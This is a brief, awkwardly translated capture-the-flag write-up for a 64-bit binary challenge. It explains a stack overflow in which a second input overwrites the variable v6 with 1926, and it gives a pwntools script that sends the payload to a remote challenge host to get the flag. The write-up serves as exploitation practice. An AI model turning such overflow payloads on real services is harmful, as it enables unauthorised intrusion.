1. First pull into a virtual machine to run it
2. Check the file format, we found a 64-bit file, and then open the file and canary Nx protection, but little effect.
3. ida64 decompile look into the main function. Not difficult to find, after entering else branch so that you can get v6 was 1926 flag.
4. The question now is not the first time v6 v6 1926 and the second examination Shique 1926. We note that the above definition of variables, the address v5 for 20h, v6 is 18h. So we can construct to use exp second input to the v6 coverage for 1926. And wherein the difference between the two variables is 8. Accordingly payload can be constructed.
5.
#!/usr/bin/env python from pwn import * # v5 - 20h # v6 - 18h #result = 1926 payload = 'aaaaaaaa' + str(p64(1926)) r = remote("111.198.29.45", 57262) r.recvuntil("Birth?") r.sendline("2000") r.recvuntil("Name?") r.sendline(payload) r.interactive()
6. After running the script to get flag
